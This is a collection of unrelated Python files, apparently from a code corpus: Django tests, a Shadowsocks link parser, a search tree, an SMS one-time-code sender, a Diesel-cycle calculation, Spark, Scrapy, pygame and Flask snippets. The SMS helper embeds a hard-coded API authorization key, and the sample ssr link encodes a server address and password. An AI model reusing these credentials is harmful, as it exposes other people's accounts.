        self.a2 = models.new_assignment(
            registration=self.registration, committee=self.committee)
        self.a3 = models.new_assignment()

    def test_anonymous_user(self):
        '''It rejects a request from an anonymous user.'''
        response = self.get_response()
        self.assertNotAuthenticated(response)
        response = self.get_response(params={'school_id': self.school.id})
        self.assertNotAuthenticated(response)

    def test_advisor(self):
        '''It returns the assignments for the school's advisor.'''
        self.client.login(username='advisor', password='advisor')
        response = self.get_response()
        self.assertPermissionDenied(response)
        response = self.get_response(params={'school_id': self.school.id})
        self.assert_assignments_equal(response, [self.a1, self.a2])

    def test_chair(self):
        '''It returns the assignments associated with the chair's committee'''
        self.client.login(username='chair', password='chair')
        response = self.get_response()
        self.assertPermissionDenied(response)
        response = self.get_response(
            params={'committee_id': self.committee.id})
        self.assert_assignments_equal(response, [self.a1, self.a2])

    def test_delegate(self):
        '''Delegates cannot access assignments in bulk.'''
        self.client.login(username='delegate', password='delegate')
        response = self.get_response()
        self.assertPermissionDenied(response)

    def test_other_user(self):
        '''It rejects a request from another user.'''
        user2 = models.new_user(username='another', password='user')
        models.new_school(user=user2)
        self.client.login(username='another', password='user')
        response = self.get_response()
        self.assertPermissionDenied(response)
        response = self.get_response(params={'school_id': self.school.id})
        self.assertPermissionDenied(response)

    def test_superuser(self):
        '''It returns the assignments for a superuser.'''
        models.new_superuser(username='test', password='user')
        self.client.login(username='test', password='user')
        response = self.get_response()
        self.assert_assignments_equal(response, [self.a1, self.a2, self.a3])
        response = self.get_response(params={'school_id': self.school.id})
        self.assert_assignments_equal(response, [self.a1, self.a2])

    def _paper_data(self, paper):
        '''Expected serialized form of an assignment's position paper.'''
        return OrderedDict(
            [('id', paper.id), ('file', paper.file),
             ('graded_file', paper.graded_file),
             ('graded', paper.graded), ('score_1', paper.score_1),
             ('score_2', paper.score_2), ('score_3', paper.score_3),
             ('score_4', paper.score_4), ('score_5', paper.score_5),
             ('score_t2_1', paper.score_t2_1),
             ('score_t2_2', paper.score_t2_2),
             ('score_t2_3', paper.score_t2_3),
             ('score_t2_4', paper.score_t2_4),
             ('score_t2_5', paper.score_t2_5),
             ('submission_date', paper.submission_date)])

    def assert_assignments_equal(self, response, assignments):
        '''Assert that the response contains the assignments in order.'''
        self.assertEqual(response.data, [{
            'id': a.id,
            'country': a.country_id,
            'committee': a.committee_id,
            'registration': a.registration_id,
            'paper': self._paper_data(a.paper),
            'rejected': a.rejected,
        } for a in assignments])
|
24,111 | ad32ed60bf457ca2edc7621f7c5cd31ee9ea1bdd | #!/usr/bin/python
#coding=utf-8
import base64
def add_equal(string):
    """
    Pad a base64-encoded string with '=' so its length is a multiple of 4.

    Bug fixed: the original computed ``4 - len(string) % 4``, which is never
    zero, so an already-aligned string wrongly received four extra '='
    characters and could no longer be base64-decoded. Strings whose length
    is already a multiple of 4 are now returned unchanged.
    """
    missing_padding = len(string) % 4
    if missing_padding:
        string += "=" * (4 - missing_padding)
    return string
def parse_ss(ss):
    """
    Parse a decoded ss:// payload of the form "method:password@host:port"
    into a configuration dictionary with fixed protocol/obfs defaults.
    """
    parts = ss.split("@")
    creds, endpoint = parts[0], parts[1]
    cred_parts = creds.split(":")
    host_parts = endpoint.split(":")
    return {
        "ip": host_parts[0],
        "port": host_parts[1],
        "method": cred_parts[0],
        "passwd": cred_parts[1],
        # ss URIs carry no protocol/obfs information; use the defaults.
        "protocol": "origin",
        "obfs": "plain",
        "type": "ss",
    }
def parse_ssr(ssr):
    """
    Parse a decoded ssr:// payload into a configuration dictionary.

    The part before '/?' has the layout
    host:port:protocol:method:obfs:base64(password); the password field is
    URL-safe base64, so '-' and '_' are mapped back to '+' and '/' (and the
    padding restored via add_equal) before decoding.
    """
    main_part = ssr.split("/?")[0]
    fields = main_part.split(":")
    passwd_b64 = add_equal(fields[5]).replace('-', '+').replace('_', '/')
    return {
        "ip": fields[0],
        "port": fields[1],
        "protocol": fields[2],
        "method": fields[3],
        "obfs": fields[4],
        "passwd": base64.b64decode(passwd_b64),
        "type": "ssr",
    }
def getConfig(s):
    """
    Decode an 'ss://...' or 'ssr://...' URI into a configuration dict.

    Returns None when the payload cannot be base64-decoded (the error is
    printed) or when the scheme is unrecognised, mirroring the original
    fall-through behaviour.
    """
    temp = s.split("://")
    config_type = temp[0]
    # Before decoding, map the URL-safe characters '-' and '_' back to the
    # standard base64 alphabet '+' and '/', and restore '=' padding.
    config_info_base64 = add_equal(temp[1])
    try:
        config_info = base64.b64decode(
            config_info_base64.replace('-', '+').replace('_', '/'))
    except Exception as e:
        print(str(e))
    else:
        # b64decode returns bytes under Python 3; decode to text so the
        # parse helpers can split on str separators (the original passed
        # bytes through and crashed on Python 3).
        if isinstance(config_info, bytes):
            config_info = config_info.decode('utf-8')
        # (Dropped the redundant len() checks from the original.)
        if config_type == "ss":
            return parse_ss(config_info)
        elif config_type == "ssr":
            return parse_ssr(config_info)
def makeConfig(d):
    """Inverse of getConfig(): serialise a config dict back into an ss:// or
    ssr:// link.  Returns None implicitly for any other "type" value.

    NOTE(review): written for Python 2 -- base64.b64encode() is called on str
    and its result concatenated with str; on Python 3 both would raise.
    """
    config_type = d['type']
    if (len(config_type) == 2 and config_type == "ss"):
        # ss body layout: method:password@host:port
        config_file = d['method'] + ":" + d['passwd'] + "@" + d['ip'] + ":" + d['port']
        # print(config_file)
        config_file_base64 = base64.b64encode(config_file)
        return "ss://"+config_file_base64
    if (len(config_type) == 3 and config_type == "ssr"):
        passwd_base64 = base64.b64encode(d['passwd'])
        # ssr body layout: host:port:protocol:method:obfs:base64(password)/?<empty params>
        config_file = d['ip'] + ":" + d['port'] + ":" + d['protocol'] + ":" + d['method'] + ":" + d['obfs'] + ":" + passwd_base64 + "/?obfsparam=&protoparam=&remarks=&group=&udpport=0&uot=0"
        # print(config_file)
        config_file_base64 = base64.b64encode(config_file)
        return "ssr://"+config_file_base64.strip('=')
if __name__ == "__main__":
    # Smoke test: decode a sample ssr:// share link and print the config dict.
    test = "ssr://MTc2LjEyMi4xMzIuMTIwOjIzMzM6YXV0aF9hZXMxMjhfbWQ1OmFlcy0xMjgtY3RyOnRsczEuMl90aWNrZXRfYXV0aDpjR0Z6YzNkdmNtUXgvP29iZnNwYXJhbT0mcHJvdG9wYXJhbT0mcmVtYXJrcz0mZ3JvdXA9JnVkcHBvcnQ9MCZ1b3Q9MA"
    print(getConfig(test))
|
24,112 | 24294685e38b0c42048010a0be113ca7e145fa6d | from StudiObject import StudiObject
from TreeNode import TreeNode
class BinarySearchTree:
    """Binary search tree ordered by ``key(node.key)``.

    Duplicates are allowed and are stored in the *left* subtree (both
    insertion and lookup compare with ``<=``).  ``key`` extracts the
    comparison value from the payload stored in each TreeNode.
    """
    def __init__(self, key=lambda x: x):
        # key: comparison-value extractor applied to every stored payload.
        self.root = None
        self.key = key
    def __iter__(self):
        """Iterate payloads in ascending (inorder) order."""
        yield from self.inorder()
    def _find_parent(self, child_node):
        """Return the parent of ``child_node`` by key-guided descent from the root.

        Raises for the root itself and for nodes not reachable in this tree.
        """
        current_parent = self.root
        # special case child_node is root:
        if id(current_parent) == id(child_node):
            raise Exception("root-node has no parent!")
        while current_parent is not None:
            # if it is parent, return it
            if current_parent.left is child_node or current_parent.right is child_node:
                return current_parent
            # this isn't the parent, try next one
            if self.key(child_node.key) <= self.key(current_parent.key):
                current_parent = current_parent.left
            else:
                current_parent = current_parent.right
        raise Exception("no parent found!")
    def search(self, my_key_data, key=None):
        """Return a list of all nodes whose extracted key equals ``my_key_data``.

        With the tree's own key function this is an ordinary BST descent
        (equal keys live to the left, so it keeps descending left on ties);
        with any other key function the whole tree is scanned.
        """
        ret = []
        current: TreeNode = self.root
        if key is None or key is self.key:
            while current is not None:
                if my_key_data == self.key(current.key):
                    ret.append(current)
                if my_key_data <= self.key(current.key):
                    current = current.left
                else:
                    current = current.right
        else: # we need to use a different key-func, so our nicely sorted BST is irrelevant and we need to find it by iterating over everything ;(
            for current in self._node_inorder(self.root):
                if my_key_data == key(current.key):
                    ret.append(current)
        return ret # returns [] if nothing found
    def _insert(self, root: TreeNode, new_node: TreeNode):
        """Recursively place ``new_node`` below ``root`` (equal keys go left)."""
        if self.key(new_node.key) <= self.key(root.key):
            # must be inserted to the left of root
            if root.left is None:
                root.left = new_node
            else:
                self._insert(root.left, new_node)
        else:
            # must be inserted to the right of root
            if root.right is None:
                root.right = new_node
            else:
                self._insert(root.right, new_node)
    def insert(self, val):
        """Insert ``val`` and return its new TreeNode.

        NOTE(review): when the tree was empty the bare ``return`` below skips
        ``return new_node``, so the very first insert returns None -- confirm
        callers don't rely on the node in that case.
        """
        new_node = TreeNode(val)
        # special case root is empty:
        if self.root is None:
            self.root = new_node
            return
        # normal case:
        self._insert(self.root, new_node)
        return new_node
    @staticmethod
    def _inorder(root):
        """Yield the payloads of subtree ``root`` in ascending order."""
        if root:
            yield from BinarySearchTree._inorder(root.left)
            yield root.key
            yield from BinarySearchTree._inorder(root.right)
    @staticmethod
    def _node_inorder(root):
        """Yield the TreeNodes themselves of subtree ``root`` in ascending order."""
        if root:
            yield from BinarySearchTree._node_inorder(root.left)
            yield root
            yield from BinarySearchTree._node_inorder(root.right)
    def inorder(self):
        """Iterator over all stored payloads in ascending order."""
        return BinarySearchTree._inorder(self.root)
    def delete(self, what, key=None): # deletes all found, returns list of deleted nodes
        """Delete every node matching ``what`` (same matching rules as search()).

        NOTE(review): the trailing comment above is stale -- the return is
        commented out below, so this actually returns None.
        """
        ret = self.search(what, key)
        for node in ret:
            self.delete_node(node)
        #return ret
    def _get_inorder_successor(self, node: TreeNode):
        """Return the smallest node of ``node``'s right subtree (raises if none)."""
        try:
            my_generator = self._node_inorder(node.right)
            successor = next(my_generator) # if this fails it means it didn't have 2 children
            return successor
        except:
            raise Exception("no successor found!")
    def delete_node(self, del_node: TreeNode):
        """Unlink ``del_node`` from the tree.

        Handles the three classic cases: leaf, single child, two children
        (the last by copying the inorder successor's key into ``del_node``).
        """
        if del_node is None:
            return print("Can't delete a non-existing Node!")
        # Node is a leaf
        elif del_node.left is None and del_node.right is None:
            parent = self._find_parent(del_node)
            # Which parent pointer to clear is decided by key comparison,
            # mirroring the descent rule used at insertion time.
            if self.key(del_node.key) <= self.key(parent.key):
                parent.left = None
            else:
                parent.right = None
        # Node has a left child
        elif del_node.left is not None and del_node.right is None:
            if del_node is self.root:
                self.root = del_node.left
            else:
                parent = self._find_parent(del_node)
                if parent.right is del_node:
                    parent.right = del_node.left
                elif parent.left is del_node:
                    parent.left = del_node.left
                else:
                    raise Exception("ok, we just destroyed causality!?")
        # Node has a right child
        elif del_node.left is None and del_node.right is not None:
            if del_node is self.root:
                self.root = del_node.right
            else:
                parent = self._find_parent(del_node)
                if parent.right is del_node:
                    parent.right = del_node.right
                elif parent.left is del_node:
                    parent.left = del_node.right
                else:
                    raise Exception("ok, we just destroyed causality!?")
        # Node has 2 children
        else:
            # 1. find minimum from right subtree
            my_generator = self._node_inorder(del_node.right)
            minimum_node = next(my_generator) # if this fails it means it didn't have 2 children
            # 2. replace value of del_node with this minimum-value
            tmp = minimum_node.key
            # 3. call delete for minimum-node
            # (the successor is removed *before* del_node.key is overwritten,
            # so the key-guided parent search still works)
            self.delete_node(minimum_node)
            del_node.key = tmp
    def change_value(self, modified_node):
        """Re-sort a node whose payload changed: remove it and re-insert the value."""
        val = modified_node.key
        self.delete_node(modified_node)
        self.insert(val)
if __name__ == "__main__":
    # Manual smoke test: insert three ints, print the sorted traversal,
    # delete one by value, and print the traversal again.
    bst = BinarySearchTree()
    # bst.insert(StudiObject("B", 2))
    # bst.insert(StudiObject("A", 1))
    # bst.insert(StudiObject("C", 99999))
    # bst.insert(StudiObject("D", 10))
    # bst.insert(StudiObject("E", 223))
    a = bst.insert(100)
    bst.insert(99)
    bst.insert(98)
    print("Traversal:")
    for k in bst:
        print(k)
    s = bst.search(99)
    print("search for 99: %s" % s)
    print("Delete searched node:")
    bst.delete_node(s[0])
    print("Traversal:")
    for k in bst:
        print(k)
|
24,113 | 4e9a57abb61e5900aade55e8ffeb968a51727283 | #video_name = r"C:\Users\PANKAJ\Desktop\DBMS\virtual_museum\vit.mp4" #This is your video file path
import os
from tkinter import *
# Minimal Tk window with one radio button that launches a hard-coded video file.
app = Tk()
app.title('Video Player')
Fcanvas = Canvas(bg="black", height=600, width=170)
def snd1():
    # Hands the path to the Windows shell; presumably the OS file association
    # opens the default media player.  Hard-coded, non-portable path.
    os.system(r"C:\Users\PANKAJ\Desktop\DBMS\virtual_museum\vit.mp4")
var = IntVar()
rb1 = Radiobutton(app, text= "Play Video", variable = var, value=1, command=snd1)
rb1.pack(anchor = W)
Fcanvas.pack()
app.mainloop()
|
24,114 | b01f48da1ae2ed0f1b3bbe3203e9037b4149ac72 | import requests
# import library
import math, random
import datetime
from datetime import timedelta
def send_sms(mobile, code):
    """Send the verification code ``code`` to ``mobile`` via the Fast2SMS bulk API.

    Best-effort: errors are printed, never raised.  The parsed JSON response
    is printed on success.
    SECURITY(review): the API key below is hard-coded in source control --
    it should be moved to configuration/environment and rotated.
    """
    url = 'https://www.fast2sms.com/dev/bulk'
    payload = {
        'sender_id': 'IMATKA',
        'message': 'iMatka Verification Code %s' % (code, ),
        'language': 'english',
        'route': 'p',
        'numbers': mobile,
        # 'flash': '1'
    }
    headers = {'authorization': 'ZJcnFtUN6SzAlDrdR1WkP7GgyOi8hwqb9spT20x5XYQICaumjLLbqn47VhJ3tMx0ICZdoNUgPkziwElX'}
    try:
        r = requests.post(url, data=payload, headers=headers)
        print(r.json())
    except Exception as e:
        print(str(e))
# function to generate OTP
def generateOTP():
    """Return a random 6-digit one-time password as a string.

    Uses the ``secrets`` module rather than ``random``: an OTP is a security
    token, and the default PRNG in ``random`` is not cryptographically strong.
    """
    import secrets  # local import keeps the module's top-level imports untouched
    digits = "0123456789"
    return "".join(secrets.choice(digits) for _ in range(6))
def get_today_range(is_past_date=False, is_tomorrow_date=False):
    """Return ``[start, end]`` datetimes bracketing today.

    is_past_date:     start the range at the beginning of *yesterday*.
    is_tomorrow_date: end the range at the end of *tomorrow*.

    Bug fix: the original used ``date.today() + timedelta(hours=7)``; adding
    a sub-day timedelta to a ``date`` adds zero days, so the "tomorrow" flag
    had no effect at all.  It now extends the range by one full day.
    """
    today = datetime.date.today()
    start_day = today - timedelta(days=1) if is_past_date else today
    end_day = today + timedelta(days=1) if is_tomorrow_date else today
    today_min = datetime.datetime.combine(start_day, datetime.time.min)
    today_max = datetime.datetime.combine(end_day, datetime.time.max)
    return [today_min, today_max]
|
24,115 | 39b5cb3a40670d90ae7476208d76d74ff04e7167 | # coding: utf8
# Sauf mention explicite du contraire par la suite, ce travail a été fait par
# Jean-Julien Fleck, professeur de physique/IPT en PCSI1 au lycée Kléber.
# Vous êtes libres de le réutiliser et de le modifier selon vos besoins.
"""
Le but de ce script est la résolution d'un exercice concernant un cycle Diesel
à double combustion (cf fichier py4phys.pdf pour le détail de l'exercice)
"""
import numpy as np # Les outils mathématiques
import CoolProp.CoolProp as CP # Les outils thermodynamiques
import matplotlib.pyplot as plt # Les outils graphiques
P,T,s,v = {},{},{},{}
# Les données de l'énoncé
R = 8.314 # Constante des gaz parfaits
gaz = 'Air' # Type de gaz
T[1]= 293
P[1]= 1e5
P[3]= 65e5
P[4]= P[3]
T[4]= 2173
a = 19
# Calcul du coefficient de Laplace (en le supposant inchangé sur tout le cycle)
cP = CP.PropsSI('C','T',T[1],'P',P[1],gaz)
cV = CP.PropsSI('O','T',T[1],'P',P[1],gaz)
gamma = cP/cV
# et de la masse molaire (NB: pour eux le "SI" de M, c'est le kg/kmol...)
M = CP.PropsSI(gaz,'molemass')*1e-3
# Un peu de feedback pour l'utilisateur:
print('Gaz choisi:',gaz)
print('Masse molaire:',M,'kg/mol')
print('gamma:',gamma)
# Fonction dichotomique utile
def find_P_from_v_s(v, s, Pstart, Pstop, eps=1e-6):
    """Recover the pressure by bisection from the mass volume ``v`` and mass
    entropy ``s``, searching the bracket [Pstart, Pstop].

    Relies on v(P) at constant s being monotonic over the bracket (true for
    the gas states used in this script).  Uses the module-level CoolProp
    handle ``CP`` and gas name ``gaz``.
    """
    # Bug fix: ``Pm`` was only assigned inside the loop; if the bracket was
    # already within tolerance the original raised NameError on return.
    Pm = (Pstart + Pstop) / 2.0
    v1 = 1/CP.PropsSI('D', 'P', Pstart, 'S', s, gaz)
    v2 = 1/CP.PropsSI('D', 'P', Pstop, 'S', s, gaz)
    while abs(v2 - v1)/v > eps:
        Pm = (Pstart + Pstop) / 2.0
        vm = 1/CP.PropsSI('D', 'P', Pm, 'S', s, gaz)
        # Keep the half-bracket whose volume interval still contains v.
        if (vm - v)*(v2 - v) < 0:
            Pstart, v1 = Pm, vm
        else:
            Pstop, v2 = Pm, vm
    return Pm
# Calculs des points intermédiaires
v[1]= 1/CP.PropsSI('D','P',P[1],'T',T[1],gaz) # Inverse de densité
v[2]= v[1]/a # Facteur de compression
s[1]= CP.PropsSI('S','T',T[1],'P',P[1],gaz) # Entropie correspondante
s[2]= s[1] # Isentropique
P[2]= find_P_from_v_s(v[2],s[2],P[1],P[3]) # Récupération pression (faut ruser)
T[2]= CP.PropsSI('T','P',P[2],'S',s[2],gaz) # Température correspondante
v[3]= v[2] # Isochore
T[3]= CP.PropsSI('T','P',P[3],'D',1/v[3],gaz) # dont on connaît la pression finale
v[4]= 1/CP.PropsSI('D','P',P[4],'T',T[4],gaz) # Isobare à T connue
s[4]= CP.PropsSI('S','P',P[4],'T',T[4],gaz) # et calcul de l'entropie correspondante
s[5]= s[4] # Isentropique
v[5]= v[1] # Dernière isochore
P[5]= find_P_from_v_s(v[5],s[5],P[1],P[3]) # Ruse sioux pour la pression
T[5]= CP.PropsSI('T','P',P[5],'D',1/v[5],gaz) # et obtention de la T correspondante
# On échantillonne à présent les pressions sur les différents chemins...
nb_points = 100
P12 = np.linspace(P[1],P[2],nb_points)
P23 = np.array([P[2],P[3]])
P34 = np.array([P[3],P[4]])
P45 = np.linspace(P[4],P[5],nb_points)
P51 = np.array([P[5],P[1]])
# ...pour calculer les volumes massiques correspondants (comme d'habitude,
# CoolProp fournit la masse volumique (densité "D") et non le volume massique
# donc il faut passer à l'inverse).
v12 = 1/CP.PropsSI('D','P',P12,'S',s[1],gaz) # Compression isentropique
v23 = [v[2],v[3]] # Compression isochore
v34 = [v[3],v[4]] # Détente isobare
v45 = 1/CP.PropsSI('D','P',P45,'S',s[4],gaz) # Détente isentropique
v51 = [v[5],v[1]] # Détente isochore
def infos_point(nb, P, T, v):
    """Print a one-line summary (T in K, v in m^3/kg, P in bar) for state point ``nb``."""
    temperature = round(T, 1)
    pression_bar = round(P / 1e5, 1)
    volume = round(v, 4)
    print('Infos pour le point {0}: T={1} K, v={3} m^3/kg, P={2} bar'.format(nb, temperature, pression_bar, volume))
def travail(L_P, L_v):
    """Return the total work received over the cycle: minus the sum of the
    trapezoidal integrals of P dv on each branch (pairs of L_P/L_v)."""
    return -sum(np.trapz(P, v) for P, v in zip(L_P, L_v))
def calcule_Delta(f,i,j):
    """Compute the variation of the state function ``f`` (one of 'U', 'H',
    'S' or 'G') between points ``i`` and ``j``, from the (assumed known)
    temperatures and pressures stored in the module-level dicts ``P`` and ``T``.
    """
    fi = CP.PropsSI(f,'P',P[i],'T',T[i],gaz)
    fj = CP.PropsSI(f,'P',P[j],'T',T[j],gaz)
    return fj-fi
# On donne du feedback:
print('Cas réel:')
for i in range(1,6):
infos_point(i,P[i],T[i],v[i])
L_P = [P12,P23,P34,P45,P51]
L_v = [v12,v23,v34,v45,v51]
W = travail(L_P,L_v) # Calcul du travail sur tout le cycle
print('Travail total sur le cycle:',round(W/1e3,2),'kJ/kg')
Q23 = calcule_Delta('U',2,3) # Q pour une isochore
Q34 = calcule_Delta('H',3,4) # Q pour une isobare
print('Transfert thermique reçu sur 2->3:',round(Q23/1e3,2),'kJ/kg')
print('Transfert thermique reçu sur 3->4:',round(Q34/1e3,2),'kJ/kg')
# Calcul du rendement
print('Rendement total: r=',-W/(Q23+Q34))
# Reste à représenter le tout
for i in range(len(L_v)):
plt.plot(L_v[i],L_P[i]/1e5,label='{}$\\to${}, reel'.format(i+1,(i+1)%5+1))
# Maintenant, faisons quelques calculs théoriques.
# D'abord les volumes massiques des deux premiers points:
v[1] = R*T[1]/(M*P[1])
v[2] = v[1]/a
# Pressions et Température en 2 s'obtiennent via la loi de Laplace
P[2] = P[1] * (v[1]/v[2])**gamma
T[2] = T[1] * (v[1]/v[2])**(gamma-1)
# Ensuite, on fait une isochore dont on connaît la pression d'arrivée
v[3] = v[2]
T[3] = M*P[3]*v[3]/R
# Après, c'est au tour de l'isobare dont on connait la température finale
v[4] = R*T[4]/(M*P[4])
# Finalement, on refait une isentropique jusqu'à atteindre v[1]
v[5] = v[1]
P[5] = P[4] * (v[4]/v[5])**gamma
T[5] = T[4] * (v[4]/v[5])**(gamma-1)
# On échantillonne à présent les pressions sur les différents chemins...
nb_points = 100
P12 = np.linspace(P[1],P[2],nb_points)
P23 = np.array([P[2],P[3]])
P34 = np.array([P[3],P[4]])
P45 = np.linspace(P[4],P[5],nb_points)
P51 = np.array([P[5],P[1]])
# ...pour calculer les volumes massiques correspondants
v12 = v[1]*(P[1]/P12)**(1/gamma) # Compression isentropique
v23 = [v[2],v[3]] # Compression isochore
v34 = [v[3],v[4]] # Détente isobare
v45 = v[4]*(P[4]/P45)**(1/gamma) # Détente isentropique
v51 = [v[5],v[1]] # Détente isochore
# On donne du feedback:
print('Cas Gaz parfait:')
for i in range(1,6):
infos_point(i,P[i],T[i],v[i])
L_P = [P12,P23,P34,P45,P51]
L_v = [v12,v23,v34,v45,v51]
W = travail(L_P,L_v) # Calcul du travail total
print('Travail total sur le cycle:',round(W/1e3,2),'kJ/kg')
Q23 = cV*(T[3]-T[2]) # Q sur une isochore
Q34 = cP*(T[4]-T[3]) # Q sur une isobare
print('Transfert thermique reçu sur 2->3:',round(Q23/1e3,2),'kJ/kg')
print('Transfert thermique reçu sur 3->4:',round(Q34/1e3,2),'kJ/kg')
print('Rendement total: r=',-W/(Q23+Q34))
# Reste à représenter le tout
for i in range(len(L_v)):
plt.plot(L_v[i],L_P[i]/1e5,label='{}$\\to${}, GP'.format(i+1,(i+1)%5+1))
plt.legend()
plt.xlabel('$v$ en m$^3/$kg')
plt.ylabel('P en bar')
plt.title("""Cycle Diesel double combustion
Comparaison du gaz reel et du gaz parfait""")
plt.savefig('PNG/T6_resolution_cycle_diesel.png')
|
24,116 | c80acb63f548726ec006372ea82566a89c88cfcf | #!/usr/bin/env python3
import os
from aws_cdk import core
from python_lambda_simple.python_lambda_simple_stack import PythonLambdaSimpleStack
# Wire up the CDK app: a single stack deployed to the account/region of the
# current CLI credentials (CDK_DEFAULT_* are provided by the CDK toolkit).
app = core.App()
# for production set your Environment to specify the target region and account
# Prod_Env__Ire = env=core.Environment(region="eu-west-1",account="<YOUR_ACCOUNT-ID>")
PythonLambdaSimpleStack(app, "python-lambda-simple", env=core.Environment(
    account=os.environ["CDK_DEFAULT_ACCOUNT"],
    region=os.environ["CDK_DEFAULT_REGION"]))
# Emit the synthesized CloudFormation template(s).
app.synth()
|
24,117 | c49e5bf87964411ab50e4830498d6b411cd823d6 | from game import Game
import pygame as pg
class Board:
    """View-side state for the play area: dirty flag, discard mode, and the
    index of the currently highlighted hand card (-1 means none)."""

    def __init__(self):
        # Nothing to repaint yet, normal (non-discard) mode, no highlight.
        self.needs_redraw = False
        self.discard = False
        self.highlight_card_index = -1

    def request_redraw(self):
        """Mark the board as dirty so the next frame repaints it."""
        self.needs_redraw = True

    def is_hand_card_highlighted(self, card_index):
        """Return True when ``card_index`` is the highlighted hand card."""
        return card_index == self.highlight_card_index

    def update_hand_card_highlight(self, card_index):
        """Move the highlight to ``card_index``; request a repaint only on change."""
        if card_index == self.highlight_card_index:
            return
        self.highlight_card_index = card_index
        self.needs_redraw = True
class GameController:
    """Mediates between UI events on hand cards and the Game model/Board view."""

    def __init__(self, game, board):
        self.game = game
        self.board = board

    def on_hand_card_mouse_over(self, hand_card_index):
        """Highlight the hovered hand card (no-op if already highlighted)."""
        self.board.update_hand_card_highlight(hand_card_index)

    def on_hand_card_mouse_down(self, hand_card_index):
        """Dispatch a click: discard in discard mode, otherwise play the card."""
        if self.board.discard:
            self.discard_card(hand_card_index)
        else:
            self.select_card(hand_card_index)

    def discard_card(self, selected_card_number):
        """Remove the chosen card from the current hand, pay the discard bonus,
        end the player's turn and trigger a repaint.

        Bug fix: the original called give_moneys_for_discard() on
        ``current_player_index`` (an index, not a player object -- compare
        select_card(), which uses ``current_player()``) and then printed an
        undefined local ``player``, which raised NameError.
        """
        hand = self.game.current_player_hand()
        del hand[selected_card_number]
        player = self.game.current_player()
        player.give_moneys_for_discard()
        print("MONEY: ", player.money)
        self.game.current_player_finished()
        self.board.request_redraw()

    def select_card(self, selected_card_number):
        """Try to play the chosen card; on success remove it from the hand,
        end the player's turn and trigger a repaint."""
        hand = self.game.current_player_hand()
        selected_card = hand[selected_card_number]
        if self.game.current_player().play_card(selected_card):
            del hand[selected_card_number]
            self.game.current_player_finished()
            self.board.request_redraw()
|
24,118 | 2ed8bed741b279dffad83ff3561bb9a54eb431cf | from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils
import json
import sys
import os
# Pull in the Kafka 0.8 connector at spark-submit time (version string must
# match the Spark/Scala build in use).
os.environ['PYSPARK_SUBMIT_ARGS'] = ' --packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.4.4 pyspark-shell'
sc = SparkContext(appName='Spark Streaming')
# 1-second micro-batches.
ssc = StreamingContext(sc, 1)
sc.setLogLevel("WARN")
# Direct (receiver-less) stream from the local Kafka broker, topic "twitter".
directKafkaStream = KafkaUtils.createDirectStream(ssc, ["twitter"], {"metadata.broker.list": "localhost:9092", "zookeeper.connection.timeout.ms": "10000"})
# Print the first records of each batch to stdout.
directKafkaStream.pprint()
ssc.start()
# Block until the streaming context is stopped externally.
ssc.awaitTermination()
24,119 | 3c5fc9ae60edf23a37e366bceff0c050a7360351 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import simplejson
import urllib
import googlemaps
import keys
class FlatvisualizerPipeline(object):
    """Default Scrapy pipeline stage: forwards every item unchanged."""

    def process_item(self, item, spider):
        """Return the item untouched so later pipeline stages receive it."""
        return item
class AddDistanceToWorkPipeLine(object):
    """Scrapy pipeline: geocode each flat's address and annotate the item
    with lat/lng and the transit travel time (minutes) to the workplace."""
    # Fixed workplace coordinates, stringified as "(lat, lng)" for the
    # Google Maps directions API.
    latitude_longitude_work = str((52.45402, 13.29320))
    def __init__(self):
        # API key comes from the project-local ``keys`` module.
        self.key = keys.GOOGLE_MAPS_API_KEY
        self.gm_client = googlemaps.Client(self.key)
    def process_item(self, item, spider):
        """Geocode item["address"], pick the fastest transit leg to work and
        store its duration in item["time_to_work"].

        Returns None (dropping the item from later stages) when no transit
        leg is found.
        NOTE(review): if geocoding returns no result, 'lat'/'lng' are never
        set and the directions call below raises KeyError -- confirm whether
        addresses are guaranteed geocodable upstream.
        """
        origin = item["address"]
        geo_location = self.gm_client.geocode(origin)
        if len(geo_location) > 0:
            for k in ('lat', 'lng'):
                item[k] = geo_location[0]['geometry']["location"][k]
        # departure_time is a fixed historical epoch timestamp, so results
        # are reproducible across runs.
        directions_result = self.gm_client.directions(str((item['lat'], item['lng'])),
                                                      self.latitude_longitude_work,
                                                      mode = "transit",
                                                      departure_time = 1421307820)
        chosen_leg = None
        if len(directions_result) > 0:
            for dr in directions_result:
                for l in dr['legs']:
                    if chosen_leg is None:
                        chosen_leg = l
                    # Keep the leg with the smallest duration seen so far.
                    if chosen_leg is not None and chosen_leg["duration"]["value"] > l["duration"]["value"]:
                        chosen_leg = l
        if chosen_leg is None:
            return
        # Duration arrives in seconds; store minutes.
        item["time_to_work"] = chosen_leg["duration"]["value"]/60.0
        return item
24,120 | c1c95a93091e0892ab204165416f2cf707ff21c2 | from django.urls import path
from . import views
# URL namespace for reverse() / {% url 'tracker:...' %} lookups.
app_name='tracker'
urlpatterns = [
    path('', views.index, name='index'),
    path('addBook/', views.addBook, name='addBook'),
    # <int:pk> routes operate on a single book by primary key.
    path('deleteBook/<int:pk>/', views.deleteBook, name='deleteBook'),
    path('moveBook/<int:pk>/', views.moveBook, name='moveBook'),
    path('profile/', views.displayProfile, name='displayProfile'),
    path('deleteAccount/', views.deleteAccount, name='deleteAccount'),
    path('books/', views.showBooks, name='showBooks')
]
24,121 | 6d87ba55efc5e3b4be679cf47cc2561dc482b5b5 | # coding=utf-8
from flask import flash, make_response, render_template, request, redirect, url_for
from flask_login import login_user, logout_user
from blog.app import app, login_manager
from blog.form import LoginForm
@app.route('/')
def homepage():
    """Render the landing page, echoing optional ``name``/``number`` query args."""
    name = request.args.get('name')
    number = request.args.get('number')
    return render_template('homepage.html', name=name, number=number)
@app.route('/login/', methods=['GET', 'POST'])
def login():
    """Render the login form; on a valid POST, log the user in and redirect.

    SECURITY(review): redirecting to the unvalidated ``next`` query parameter
    is an open-redirect risk -- consider verifying it is a relative URL.
    """
    form = LoginForm()
    if request.method == 'POST' and form.validate_on_submit():
        # form.user is presumably attached by LoginForm during validation --
        # confirm in blog.form.
        login_user(form.user, remember=form.remember_me.data)
        flash('Successfully login in as {}'.format(form.email.data), 'success')
        return redirect(request.args.get('next') or url_for('homepage'))
    return render_template('login.html', form=form)
@app.route('/logout/', methods=['GET', 'POST'])
def logout():
